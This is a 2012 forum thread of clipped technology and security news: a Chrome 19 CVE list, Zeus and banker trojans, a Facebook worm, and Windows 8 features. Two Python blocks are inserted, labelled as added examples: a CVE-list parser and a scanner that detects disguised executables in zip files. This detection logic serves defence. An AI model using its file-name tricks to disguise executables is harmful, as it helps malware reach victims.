Computerworld - Microsoft today declined to comment when asked whether it believed it's required to offer a ballot screen in Windows 8 to European users for selecting rival browsers in the new operating system's desktop mode.

In late 2009, Microsoft struck a deal with European Union (EU) antitrust regulators that required the company to display a screen in Windows providing download links to other browsers, including Mozilla's Firefox, Google's Chrome and Opera Software's Opera.

The settlement specifically called out future editions of Windows.

"For Windows Client PC Operating Systems after Windows 7, the Choice Screen update will first be made available at the general commercial release date of such an operating system and remain in place for distribution ... for the entire duration of these Commitments," the document stated.
According to the final agreement (download PDF), the deal has a five-year lifespan -- meaning it will expire in late 2014 -- and broadly defined "Windows" and "Internet Explorer" to include "successors" of the then-current Windows 7 and IE8.

More at :-
http://www.computerworld.com/s/article/9227148/EU_...

--
mogs CClip 88
Expert Contributor 15th May, 2012 21:43
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Chrome Stable Channel Update
| 08:00
Labels: Stable updates

The Google Chrome team is happy to announce the arrival of Chrome 19 to the Stable Channel for Windows, Mac, Linux and Chrome Frame. Chrome 19 contains a number of new features like tab sync. More detailed updates are available on the Chrome Blog.

Security fixes and rewards:

Please see the Chromium security page for more detail. Note that the referenced bugs may be kept private until a majority of our users are up to date with the fix.
[112983] Low CVE-2011-3083: Browser crash with video + FTP. Credit to Aki Helin of OUSPG.
[113496] Low CVE-2011-3084: Load links from internal pages in their own process. Credit to Brett Wilson of the Chromium development community.
[118374] Medium CVE-2011-3085: UI corruption with long autofilled values. Credit to “psaldorn”.
[$1000] [118642] High CVE-2011-3086: Use-after-free with style element. Credit to Arthur Gerkis.
[118664] Low CVE-2011-3087: Incorrect window navigation. Credit to Charlie Reis of the Chromium development community.
[$500] [120648] Medium CVE-2011-3088: Out-of-bounds read in hairline drawing. Credit to Aki Helin of OUSPG.
[$1000] [120711] High CVE-2011-3089: Use-after-free in table handling. Credit to miaubiz.
[$500] [121223] Medium CVE-2011-3090: Race condition with workers. Credit to Arthur Gerkis.
[121734] High CVE-2011-3091: Use-after-free with indexed DB. Credit to Google Chrome Security Team (Inferno).
[$1000] [122337] High CVE-2011-3092: Invalid write in v8 regex. Credit to Christian Holler.
[$500] [122585] Medium CVE-2011-3093: Out-of-bounds read in glyph handling. Credit to miaubiz.
[122586] Medium CVE-2011-3094: Out-of-bounds read in Tibetan handling. Credit to miaubiz.
[$1000] [123481] High CVE-2011-3095: Out-of-bounds write in OGG container. Credit to Hannu Heikkinen.
[Linux only] [123530] Low CVE-2011-3096: Use-after-free in GTK omnibox handling. Credit to Arthur Gerkis.
[123733] [124182] High CVE-2011-3097: Out-of-bounds write in sampled functions with PDF. Credit to Kostya Serebryany of Google and Evgeniy Stepanov of Google.
[Windows only] [124216] Low CVE-2011-3098: Bad search path for Windows Media Player plug-in. Credit to Haifei Li of Microsoft and MSVR (MSVR:159).
[124479] High CVE-2011-3099: Use-after-free in PDF with corrupt font encoding name. Credit to Mateusz Jurczyk of Google Security Team and Gynvael Coldwind of Google Security Team.
[124652] Medium CVE-2011-3100: Out-of-bounds read drawing dash paths. Credit to Google Chrome Security Team (Inferno).

And some additional rewards for issues with a wider scope than Chrome:

[Linux only] [$500] [118970] Medium CVE-2011-3101: Work around Linux Nvidia driver bug. Credit to Aki Helin of OUSPG.
[$1500] [125462] High CVE-2011-3102: Off-by-one out-of-bounds write in libxml. Credit to Jüri Aedla.

Many of the above bugs were detected using AddressSanitizer.

We’d also like to thank Aki Helin of OUSPG, Sławomir Błażek, Chamal de Silva, miaubiz, Arthur Gerkis and Christian Holler for working with us during the development cycle and preventing security regressions from ever reaching the stable channel. $9000 of additional rewards were issued for this awesomeness.


Full details about what changes are in this release are available in the SVN revision log. Interested in hopping on the stable channel? Find out how. If you find a new issue, please let us know by filing a bug.

Anthony Laforge
Google Chrome
http://googlechromereleases.blogspot.co.uk/

--
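A triage aid for the fix list quoted in the post above, as an added example that is not part of the original post or of Google's release tooling: it parses the bracketed prefixes (reward, platform, one or more bug ids) and tallies severity and memory-safety bug classes. The sample lines are a subset copied from the list above; the function names and the bug-class keywords are assumptions made for this example.

```python
import re
from collections import Counter

# Subset of the entries quoted in the post above, plus one non-entry line.
SAMPLE_NOTES = """\
[112983] Low CVE-2011-3083: Browser crash with video + FTP. Credit to Aki Helin of OUSPG.
[$1000] [118642] High CVE-2011-3086: Use-after-free with style element. Credit to Arthur Gerkis.
[$500] [120648] Medium CVE-2011-3088: Out-of-bounds read in hairline drawing. Credit to Aki Helin of OUSPG.
[123733] [124182] High CVE-2011-3097: Out-of-bounds write in sampled functions with PDF. Credit to Kostya Serebryany of Google and Evgeniy Stepanov of Google.
[Windows only] [124216] Low CVE-2011-3098: Bad search path for Windows Media Player plug-in. Credit to Haifei Li of Microsoft and MSVR (MSVR:159).
[Linux only] [$500] [118970] Medium CVE-2011-3101: Work around Linux Nvidia driver bug. Credit to Aki Helin of OUSPG.
[$1500] [125462] High CVE-2011-3102: Off-by-one out-of-bounds write in libxml. Credit to Jüri Aedla.
Many of the above bugs were detected using AddressSanitizer.
"""

TAG_RE = re.compile(r"\[([^\]]+)\]\s*")
ENTRY_RE = re.compile(
    r"(?P<severity>Low|Medium|High|Critical)\s+(?P<cve>CVE-\d{4}-\d{4,}):\s*"
    r"(?P<summary>.*?)\.\s+Credit to\s+(?P<credit>.+?)\.?$"
)
# Classes a memory-error detector is designed to catch (keyword match, an assumption).
MEMORY_SAFETY = {"use-after-free", "out-of-bounds read", "out-of-bounds write"}


def classify(summary):
    """Map a one-line summary to a coarse bug class by keyword."""
    text = summary.lower()
    if "use-after-free" in text or "use after free" in text:
        return "use-after-free"
    if "out-of-bounds write" in text or "invalid write" in text:
        return "out-of-bounds write"
    if "out-of-bounds read" in text:
        return "out-of-bounds read"
    if "race" in text:
        return "race condition"
    return "other"


def parse_line(line):
    """Parse one release-note line; return None if it is not a fix entry."""
    line = line.strip()
    entry = {"platform": None, "reward_usd": 0, "bugs": []}
    pos = 0
    while True:
        tag = TAG_RE.match(line, pos)
        if not tag:
            break
        value = tag.group(1).strip()
        if value.startswith("$") and value[1:].isdigit():
            entry["reward_usd"] = int(value[1:])   # e.g. [$1000]
        elif value.isdigit():
            entry["bugs"].append(int(value))       # e.g. [118642]
        else:
            entry["platform"] = value              # e.g. [Linux only]
        pos = tag.end()
    body = ENTRY_RE.match(line, pos)
    if not body or not entry["bugs"]:
        return None
    entry.update(body.groupdict())
    entry["bug_class"] = classify(entry["summary"])
    return entry


def parse_notes(text):
    """Return the parsed entries, skipping lines that are not fix entries."""
    return [e for e in map(parse_line, text.splitlines()) if e]


def summarize(entries):
    """Counts a patch manager would look at first."""
    return {
        "by_severity": dict(Counter(e["severity"] for e in entries)),
        "memory_safety": sum(e["bug_class"] in MEMORY_SAFETY for e in entries),
        "rewards_usd": sum(e["reward_usd"] for e in entries),
    }


if __name__ == "__main__":
    parsed = parse_notes(SAMPLE_NOTES)
    print(summarize(parsed))
    for e in parsed:
        if e["severity"] == "High":
            print(e["cve"], e["bug_class"], e["bugs"])
```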
mogs CClip 89
Expert Contributor 15th May, 2012 21:51
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Microsoft announces Windows 8 Family Safety child monitoring feature

Parents will receive weekly activity reports via email
By Lee Bell
Tue May 15 2012, 12:44

SOFTWARE HOUSE Microsoft has announced that its Windows 8 operating system will offer weekly monitoring reports on children's online activity when it is released later this year.
In an effort to make it easier for parents to supervise their pesky children who they suspect are getting up to no good online, Microsoft said that its Family Safety feature will monitor web pages they've visited, their latest searches and their most used apps and games.
In a Building Windows 8 post on the Microsoft Developer Network blog, lead programme manager for Microsoft Phil Sohn said that the firm's Family Safety system will "monitor first", rather than focusing on filtering and software-based restrictions, as these could be difficult to set up and manage.
"The end result was that many parents abandoned family safety products and returned to in-person supervision only - a tactic that has become less effective as computers have gotten more mobile," he said.

More at :-
http://www.theinquirer.net/inquirer/news/2174805/m...

--
mogs CClip 90
Expert Contributor 15th May, 2012 21:57
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Multiple Human Rights, Foreign Policy Sites Hacked

A rash of recent and ongoing targeted attacks involving compromises at high-profile Web sites should serve as a sobering reminder of the need to be vigilant about applying browser updates. Hackers have hit a number of prominent foreign policy and human rights group Web sites, configuring them to serve spyware by exploiting newly patched flaws in widely used software from Adobe and Oracle.

The latest reports of this apparent cyberspy activity come from security experts at Shadowserver.org, a nonprofit that tracks malware attacks typically associated with so-called “advanced persistent threat” (APT) actors. APT is a controversial term that means many things to different folks, but even detractors of the acronym’s overuse acknowledge that it has become a useful shorthand for “We’re pretty sure it came from China.”
A diagram depicting the (since-cleaned) attack on the Website of the Center for Defense Information.
One look at the list of the sites found to be currently serving an exploit to attack a newly-patched Adobe Flash Player vulnerability (CVE-2012-0779) shows how that shorthand is earned. Shadowserver uncovered Flash exploits waiting for visitors of the Web sites for Amnesty International Hong Kong and the Center for Defense Information, a Washington, D.C. think-tank. The home page for the International Institute for Counter-Terrorism was found to be serving up malware via a recent Oracle Java vulnerability (CVE-2012-0507), while the Cambodian Ministry of Foreign Affairs site was pointing to both Flash and Java exploits.

Read more at :-
http://krebsonsecurity.com/category/latest-warning...

--
mogs CClip 91
Expert Contributor 16th May, 2012 07:19
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Dev Channel Update
Tuesday, May 15, 2012 | 17:15
Labels: Dev updates
The Dev channel has been updated to 20.0.1132.8 for Windows, Mac, Linux, and Chrome Frame. This build contains updates to V8 (3.10.8.5) and several other fixes. Full details about what changes are in this build are available in the SVN revision log. Interested in switching release channels? Find out how. If you find a new issue, please let us know by filing a bug.

Dharani Govindan
Google Chrome
http://googlechromereleases.blogspot.co.uk/

--
mogs CClip 92
Expert Contributor 16th May, 2012 08:23
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Zeus variant tricks Facebook users into exposing card data
New Zeus version injects rogue debit card-related offers into popular websites

By Lucian Constantin
May 15, 2012 04:17 PM ET
IDG News Service - A new variant of the Zeus trojan tricks users into exposing their debit card details by displaying rogue offers when they visit Facebook, Gmail, Yahoo and Hotmail, according to researchers from security firm Trusteer.

"We've recently discovered a series of attacks being carried out by a P2P [peer-to-peer] variant of the Zeus platform against some of the Internet's leading online services and websites," Trusteer CTO Amit Klein said in a blog post Tuesday. "The attacks are targeting users of Facebook, Google Mail, Hotmail and Yahoo -- offering rebates and new security measures."

Like most financial malware, Zeus has the ability to inject malicious content into browsing sessions. This functionality is commonly used to display rogue Web forms when users visit online banking websites.

Read more at :-
http://www.computerworld.com/s/article/9227186/Zeu...

--
mogs CClip 93
Expert Contributor 16th May, 2012 08:29
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

EU to 'remain vigilant' on Microsoft's browser commitments
However, it's unclear if a 2009 competition agreement with Microsoft extends to tablets

By Loek Essers
May 15, 2012 05:34 PM ET
IDG News Service - Regulators in Europe said Tuesday they will watch closely to make sure Microsoft complies with its commitments to ensure competition in the browser market, after Mozilla complained its Firefox browser is being excluded from Windows RT.

However, the European Commission noted that an agreement it struck with Microsoft in 2009 to regulate its behavior applied only to "client PCs," and it wasn't immediately clear if that includes tablets, one of the main targets for Windows RT.

Mozilla protested last week that Windows RT, the version of Windows 8 for devices that use ARM processors, restricts choice and might violate an agreement Microsoft struck with the Commission to resolve an antitrust probe of the company.

Windows RT grants full access only to Internet Explorer (IE) and effectively blocks other browsers from accessing important functions, according to Mozilla. Its complaint was backed by Google, which makes the Chrome browser.

More at :-
http://www.computerworld.com/s/article/9227185/EU_...

--
mogs CClip 94
Expert Contributor 16th May, 2012 08:33
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Last edited on 16th May, 2012 08:37
Avira antivirus upgrade wreaks 'catastrophic' havoc on Windows PCs
Service pack bricks machines by blocking boots, banning launch of virtually every Windows executable

By Gregg Keizer
May 15, 2012 03:54 PM ET
Computerworld - German security firm Avira yesterday issued a service pack for its antivirus software that crippled an unknown number of Windows machines, with one customer calling the gaffe "catastrophic" to his company.

Today, Avira updated the software to sidestep the problem.

"Following the release of Service Pack 0 (SP0) for Avira Version 2012, the ProActiv feature blocked legitimate Windows applications on customers' PCs," Avira acknowledged on its support site. "We deeply regret any difficulties this has caused you."

Avira is the world's second-biggest antivirus maker, according to usage statistics.

More at :-
http://www.computerworld.com/s/article/9227182/Avi...

Oops! Avira Anti-Virus Update Disables Windows PCs

A recent update detected almost every executable file as malware.

By Jeff Goldman | May 15, 2012

A recent Avira anti-virus update, downloaded by millions of users, effectively disabled users' Windows XP, Windows Vista and Windows 7 computers.

"The update bumps the software version to 8.2.10.64 and the definitions file to 7.11.30.24," writes ZDNet's Emil Protalinski. "The result is that the AntiVirProActiv component starts detecting critical processes as malware ... Avira sometimes kills them and stops Windows from booting, but that’s not the end of it. The update is also blocking other Microsoft software (such as Microsoft Office and Microsoft Works) as well as various third-party applications, including Byki 4 Express, Documents To Go, Garmin, Google Talk, iPod and Palm services, Opera, OpenDNS Updater, Polipo, Shadow, Stickies, and many others. In other words, almost every executable file is being falsely detected by this update."

"On the Avira forum, an employee of a company which runs Avira on one hundred computers complains that, 'This update has been pretty catastrophic. The whole company ground to a standstill,'" The H Security reports.

The company has since released an update that addresses the issue, stating, "We deeply regret any difficulties this has caused you. Thank you for your patience and understanding."

"The inadvertent blocking impacted Avira Professional Security, Avira Internet Security 2012 and Avira Antivirus Premium 2012, paid products priced between $30 and $60," writes Computerworld's Gregg Keizer. "Avira's free antivirus software, which has limited functionality -- and does not include ProActiv -- was not affected."

http://www.esecurityplanet.com/windows-security/oo...

--
mogs CClip 95
Expert Contributor 16th May, 2012 08:45
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Apple issues security update for QuickTime

Apple has released a major security update for the Windows versions of its QuickTime media player.
The company said that the QuickTime 7.7.2 update would address some 17 security vulnerabilities in QuickTime for Windows 7, Vista and Windows XP SP2 or later.
Among the issues addressed in the update are flaws which could allow an attacker to remotely execute code on a target system. Among the vulnerable QuickTime components are tools which handle movie files, MP4 content, and web pages.
Each of the flaws can be triggered by tricking a user into viewing a specially-crafted media file or web page.
Much of the credit for the research was given to HP's TippingPoint security initiative. Apple cited researchers affiliated with the program in discovering 14 of the 17 patched security issues.
For users running the OS X version of QuickTime, Apple's release should cause little to no new concern. Many of the listed vulnerabilities were not applicable to OS X, while a number of others were addressed in Apple's recent OS X Lion 10.7.3 release and OS X 10.6 security update.
Users can obtain the security update through Apple's Software Update tool or by downloading the latest version of QuickTime from the comp

Read more at :-
http://www.v3.co.uk/v3-uk/news/2174999/apple-issue...

--
mogs CClip 96
Expert Contributor 16th May, 2012 12:13
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

May 16th, 2012, 09:02 GMT · By Eduard Kovacs
Fake Google Chrome Installer Pushes Shady Bank Sites

Google Chrome is a popular browser that’s currently utilized by millions of people worldwide, but users should be careful because not all “ChromeSetup.exe” files are genuine.

Security researchers from Trend Micro have found that the cybercriminals that serve fake Chrome installer files use a clever technique to make everything look as legitimate as possible.

The unsuspecting user is presented with a download link that apparently points to URLs such as:
- br.msn.com/ChromeSetup.exe;
- facebook.com.br/ChromeSetup.exe;
- google.com.br/ChromeSetup.exe;
- terra.com.br/ChromeSetup.exe.

While it may seem that the installer is hosted on legitimate domains, in reality the downloads are redirected to different IPs than the ones of MSN, Facebook, Google, or Terra. Experts have noticed that most of the users who access the links are from Brazil and Peru.

Further analysis of this threat has revealed that the “ChromeSetup.exe” file is actually a piece of malware identified as TSPY_BANKER.EUIQ.

Once it finds itself on a system, the malicious element starts sending information gathered from the device to its command and control server.

TSPY_BANKER.EUIQ also downloads a configuration file and the fun begins. From this point on, each time the victim tries to access a bank website, the malware will step in and redirect the session to a phony bank site.

First, a pop-up notifies the users that security software is being loaded, after which, Internet Explorer is opened and the fake website is loaded.

Furthermore, since some banks offer legitimate fraud protection software to their customers, such as the GbPlugin from a Brazilian bank, the malware authors have integrated a component called TROJ_KILSRV.EUIQ which uninstalls such applications.

Experts believe that this particular malware is still in development, and they don’t rule out the possibility of improved versions being launched in the future.

The most interesting thing about the Banker is the fact that it somehow manages to redirect users from Facebook and Google to the IPs controlled by the cybercriminals. Trend Micro hasn't figured out how they can pull this off.

Fortunately for internauts, modern-day security solutions possess the ability to identify threats simply by analyzing their actions, which is why we must highlight again the importance of an antivirus application. Make sure you have one and keep it updated at all times.

http://news.softpedia.com/news/Fake-Google-Chrome-...

--
mogs CClip 97
Expert Contributor 16th May, 2012 19:47
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

ICO website hit by DDoS attack
Anonymous unconfirmed as source of breach
By Anh Nguyen | Computerworld UK | 16 May 12

The Information Commissioner's Office (ICO) website has been taken offline following a suspected distributed denial of service (DDoS) attack.

The public-facing website does not contain any sensitive information, the information watchdog said.

"Access to the ICO website has been disrupted over the past few days. We believe this is due to a distributed denial of service attack," a spokesperson for the ICO said.

"The website itself has not been damaged, but people have been unable to access it."

He added: "We regret this disruption to our service and we are working to try to bring the website back online as soon as possible."

Despite a number of reports online claiming that a group with links to the Anonymous hacktivist collective is behind the attack, over what it believes is corruption in the Leveson inquiry into press standards, the ICO spokesperson said that this could not be confirmed.

More at :-
http://www.pcadvisor.co.uk/news/security/3357911/i...

--
mogs CClip 98
Expert Contributor 16th May, 2012 22:16
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Last edited on 16th May, 2012 22:20
Google searches get smarter (Update)
May 16, 2012 by Glenn Chapman
Google on Wednesday began making its search engine smarter, in what the Internet giant called a major upgrade that looks beyond query words to figure out what people are actually seeking online.
"Knowledge Graph" technology built to recognize people, places or things signified by keywords took its fledgling steps in the United States with the hope of eventually extending it to Google searches worldwide.
"The Knowledge Graph is built to understand real things in the world," said Google fellow Ben Gomes, who has worked on search at the California-based company for more than a decade.
"It is the beginning of a long journey we will be on to cover more topics and more complex queries."
Gomes envisions Google search being able to eventually answer tricky questions such as where to attend an outdoor Lady Gaga concert in warm weather or the location of an amusement park near a vegetarian restaurant.
For now, people using US Google search in English will start seeing on search pages boxes suggesting what they are interested in finding.
A demonstration showed that searching on the word "Kings" in California, for example, prompted the search engine to point out that one is likely interested in a hockey team, basketball team, or film.
Using the keyword "Andromeda" prompted Knowledge Graph to note one might be interested in a galaxy, a television series, or a Swedish rock band.
Clicking on a suggested topic instantly refined search results.

Read more at :-
http://phys.org/news/2012-05-google-smarter.html

--
mogs CClip 99
Expert Contributor 17th May, 2012 19:37
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Last edited on 17th May, 2012 19:39
UK-based hacking doubled in first quarter of 2012
The number of cyber attacks stemming from the UK doubled during the first three months of the year, making it the seventh biggest source of online attacks in the world.
The UK is now responsible for 2.4 per cent of global cyber attacks, according to a new report from security firm NCC Group.
The sharp rise came as a shock to NCC technical director Paul Vlissidis.
"We were surprised by the variation in numbers. It's not easy to know why, I don't think the UK has been invaded by a horde of cyber criminal gangs over the last three months," Vlissidis told V3.
"Still, it's not too surprising that cybercrime is common in the UK. It's one of the most online, connected and educated societies in the world, so it makes sense that it would house a lot of cyber criminals."
NCC's quarterly Origin of Hacks report also revealed a marked increase in the number of attacks stemming from Russia. There, the number of attacks increased by 12 per cent over the quarter, making it the third biggest hacker hotbed in the world.

More at :-
http://www.v3.co.uk/v3-uk/news/2175520/uk-hacking-...

--
mogs CClip 100
Expert Contributor 17th May, 2012 19:44
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
CyberZeist Finds XSS on Intel.com and Baidu.com

A hacker known as CyberZeist has found that the website of Baidu, the largest search engine in China, and one of Intel, the world renowned semiconductor chip maker, contain cross-site scripting (XSS) vulnerabilities.

We have explained the risks posed by such security holes numerous times, so this time we’ve let the hacker himself detail the dangers that lie behind apparently simple flaws.

“These two XSS are known as Non-Persistent XSS flaws. Though they have low risk factor, but if they are unresolved, this security hole could help a remote attacker to steal accounts by cookie-hijacking,” CyberZeist said.

More at :-
http://news.softpedia.com/news/CyberZeist-Finds-XS...

--
mogs CClip 101
Expert Contributor 17th May, 2012 19:49
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Worm Uses Facebook PMs and Instant Messaging Apps to Spread

Social media platforms and popular instant messaging (IM) apps are great mediums for cybercriminals to spread their malicious elements. Trend Micro experts provide a great example of a worm that’s making its way to computers using such methods.

The researchers report that the piece of malware, identified as Worm_Steckct.evl, is distributed via a link that’s sent in private messages on Facebook and IM programs.

The shortened links contained in the posts point to an archive called “May09- Picture18.JPG_ www.facebook.com.zip” which hides a file named “May09-Picture18.JPG _www.facebook.com.” The .com extension reveals that in fact this is an executable file.

Once it’s run, the worm steps into play and terminates all the processes and services created by security software, thus ensuring that antivirus applications cannot disrupt its evildoings.

Steckct.evl then downloads another worm, detected as Worm_Eboom.ac, which monitors the victim’s browsing sessions.

The worrying part is that it doesn’t only log the posts and private messages the customer creates or deletes on Facebook, MySpace, Twitter, WordPress, or Meebo, but it can also spread by utilizing the user’s active session on these sites.

More at :-
http://news.softpedia.com/news/Worm-Uses-Facebook-...

--
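The file-name disguise described in the post above (a .com executable dressed up as a picture and a Facebook address inside a zip), as an added detection example that is not part of the original post or of Trend Micro's analysis. It also goes one step beyond the name check by flagging any archive member whose content starts with the "MZ" executable header; the extension lists, reason strings and sample archive contents are assumptions constructed for this example.

```python
import io
import re
import zipfile

# File types Windows runs directly when double-clicked (a subset; extend as needed).
EXECUTABLE_EXTS = {"com", "exe", "scr", "pif", "bat", "cmd"}
# Types users read as harmless pictures or documents.
DECOY_EXTS = {"jpg", "jpeg", "png", "gif", "pdf", "doc", "docx"}

DECOY_RE = re.compile(r"\.(?:%s)(?![a-z0-9])" % "|".join(sorted(DECOY_EXTS)), re.I)
# A trailing "www.example.com" makes the executable .com extension read as a domain.
# Two labels are required before "com" so that plain "command.com" is not matched.
HOSTNAME_TAIL_RE = re.compile(r"(?:^|[\s_])(?:[a-z0-9-]+\.){2,}com$", re.I)


def name_reasons(member_name):
    """Reasons a file name looks like a disguised executable (empty list if none)."""
    base = member_name.replace("\\", "/").rsplit("/", 1)[-1].strip()
    stem, dot, ext = base.rpartition(".")
    ext = ext.lower()
    if not dot or ext not in EXECUTABLE_EXTS:
        return []
    reasons = ["executable extension ." + ext]
    if DECOY_RE.search(stem):
        reasons.append("decoy extension earlier in name")
    if ext == "com" and HOSTNAME_TAIL_RE.search(base):
        reasons.append("hostname-style ending hides .com")
    return reasons


def content_reasons(first_bytes):
    """DOS/PE executables start with the two bytes 'MZ', whatever the name says."""
    return ["MZ executable header"] if first_bytes[:2] == b"MZ" else []


def scan_archive(zip_bytes):
    """Map each suspicious member name to the list of reasons it was flagged."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        for info in archive.infolist():
            if info.is_dir():
                continue
            with archive.open(info) as member:
                head = member.read(2)
            reasons = name_reasons(info.filename) + content_reasons(head)
            if reasons:
                findings[info.filename] = reasons
    return findings


def build_sample_archive():
    """Constructed test data: harmless placeholder bytes, not real samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        # Member name as quoted in the post; content is a dummy header plus zeros.
        archive.writestr("May09-Picture18.JPG _www.facebook.com", b"MZ" + b"\x00" * 62)
        archive.writestr("holiday.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 16)
        archive.writestr("notes.txt", b"meeting at ten\n")
        # Innocent-looking name, executable header: caught by content only.
        archive.writestr("photo.png", b"MZ" + b"\x00" * 62)
    return buf.getvalue()


if __name__ == "__main__":
    for name, reasons in scan_archive(build_sample_archive()).items():
        print(f"{name!r}: {'; '.join(reasons)}")
```

A mail or chat gateway can treat two or more reasons on one member as grounds to quarantine the archive, and a single "executable extension" reason as grounds for a warning.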
mogs CClip 102
Expert Contributor 17th May, 2012 19:56
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Vixie warns: DNS Changer ‘blackouts’ inevitable

Father of BIND fears ISP crisis in July
By Team Register

Posted in Security, 17th May 2012 00:36 GMT
Ridding the world of the DNS Changer is proving a long, slow process that won’t be accomplished by July 9, when the court orders granted to the FBI expire and infected users suffer their inevitable blackout.

That’s the bleak warning given by BIND father and ISC founder and chair Paul Vixie to the AusCERT security conference on the Gold Coast today, 17 May.

“Remediation, which has not worked, has taken many forms, which did not work,” Vixie drily noted.

The notorious “operation ghost click” is well-known and understood, having been analysed in the six months since arrest of the Estonians (Vladimir Tsatsin, Timur Gerassimenko, Dmitri Jegorov, Valeri Aleksejev, Konstantin Poltev and Anton Ivanov) who hosted their ad-redirecting DNS on Rove Digital’s infrastructure.

Vixie said ISC’s ongoing research demonstrates that when the court order expires, there will still be in the vicinity of 300,000 DNS Changer-infected computers, in spite of the best efforts at remediation. Many users, Vixie said, are so untrusting and hostile that they resent being told they have a problem.

More at :-
http://www.theregister.co.uk/2012/05/17/dns_change...

--
mogs CClip 103
Expert Contributor 21st May, 2012 21:34
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK

Chrome trumps IE as world's top browser
StatCounter says Google's browser edged Microsoft's for the week's No. 1 spot; Chrome on pace to take May, too

By Gregg Keizer
May 21, 2012 12:59 PM ET
Computerworld - Google's Chrome edged past Microsoft's Internet Explorer (IE) last week to become the world's most widely-used browser, according to data from an Irish metric firm.

Chrome's average usage share for the week of May 14-20 was 32.8%, said StatCounter, an analytics company that tracks browser and operating system trends. For the same week, IE's share was 31.9%.

Although Chrome has beaten IE in StatCounter's tally before -- a day here, another there -- this was the first time that Google's browser took the top spot for an entire week.

Mozilla's Firefox placed third with a share of 25.5%, while Apple's Safari and Opera Software's Opera brought up the rear with 7.1% and 1.7%, respectively.

Chrome and IE are locked in a dead heat so far this month, separated by only five-hundredths of a percentage point through Sunday. The trend, however, is in Chrome's favor: It came within a whisker of beating IE the week of May 7-13, and early Monday it led Microsoft's browser 31.9% to 31.5%.

More at :-
http://www.computerworld.com/s/article/9227341/Chr...

--
mogs CClip 104
Expert Contributor 21st May, 2012 21:46
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Cross-browser worm spreads via Facebook, security experts warn
Malware writers use Crossrider browser extension development framework to build Facebook worm

By Lucian Constantin | 21 May 12
Malware writers have used Crossrider, a cross-browser extension development framework, to build a click-fraud worm that spreads on Facebook, security researchers from antivirus firm Kaspersky Lab said on Monday.

Crossrider is a legitimate Javascript framework that implements a unified API (application programming interface) for building Mozilla Firefox, Google Chrome and Internet Explorer extensions.

The API allows developers to write code that will run inside different browsers and, by extension, on different OSes. The framework is still in beta testing and its creators plan on adding support for Safari soon.

"It is quite rare to analyze a malicious file written in the form of a cross-platform browser plugin. It is, however, even rarer to come across plugins created using cross-browser engines," said Kaspersky Lab malware expert Sergey Golovanov in a blog post on Monday.

Read more at :-
http://www.pcadvisor.co.uk/news/security/3359080/c...

--
mogs CClip 105
Expert Contributor 21st May, 2012 21:50
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Twitter Tweaks Privacy Policy, Adds Custom Digests
The microblogging site offers more information on its data collection habits and promises to support Do Not Track.

By John P. Mello Jr. | PC World | 21 May 12
In an e-mail Sunday, Twitter is alerting its members to changes to its policies on privacy and service usage, including support for Do Not Track, as well as informing them about a new weekly digest of interesting news and items from their feeds.

"New things are always happening here at Twitter HQ," the e-mail says. "We're growing at a rapid pace, and our commitment to simplicity, transparency, and reaching every person on the planet continues."

In the service's privacy policy, it's offering more detail -- in plain English -- about what information it collects. Not only does it collect information when you register with Twitter, but also profile information you post to your account.

Read more: http://www.pcadvisor.co.uk/news/security/3358906/t...

--
mogs CClip 106
Expert Contributor 21st May, 2012 21:56
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
Windows 8 Security: What's New
Windows 8 is a major OS overhaul, but some of the most important additions might be the ones you can't see. Here's a look at Windows 8's new security tools and features.
By Eric Geier, PCWorld
When Windows 8 comes out later this year, the new Start screen and Metro-style apps will likely be the first changes you'll notice, but those aren't the only things that are new. Microsoft is also making some serious security enhancements to help keep your system safer and to improve Windows' ability to combat viruses and malware. It just may be the biggest improvement to Windows security yet.

Antivirus Comes Preinstalled
For the first time in the history of Windows, you’ll enjoy protection from viruses, spyware, Trojan horses, rootkits, and other malware from the very first day you turn on your Windows PC--without spending a cent. Windows 8 comes with an updated version of Windows Defender that includes traditional antivirus functions in addition to the spyware protection and other security features that it has offered since Windows Vista. Windows Defender now provides similar protection--and a similar look and feel--to that of the free Microsoft Security Essentials antivirus program, which Microsoft has offered to users as an optional download since 2009.

Read more at :-
http://www.pcworld.com/article/255776/windows_8_se...

--
mogs CClip 107
Expert Contributor 21st May, 2012 22:08
Score: 2265
Posts: 6,266
User Since: 22nd Apr 2009
System Score: 100%
Location: UK
American Express Card Emails Point to Blackhole Infested Website

Emails apparently originating from American Express have been landing in inboxes, asking recipients to verify their user IDs and reset their passwords. In reality, the notifications are part of a scheme designed to trick users into visiting a website on which the Blackhole exploit kit is hosted.

Usually when we think about malicious emails from financial institutions, we picture a shady form that requests credit card information and other private data. However, as we see in this particular scenario, security-themed alerts can be just as effective in serving malware.

“Did you recently verify your User ID or reset the password that you use to manage your American Express® Card account online? If so, you can disregard this email. To help protect your identity online, we wanted to be sure that you had made this request,” reads the email.

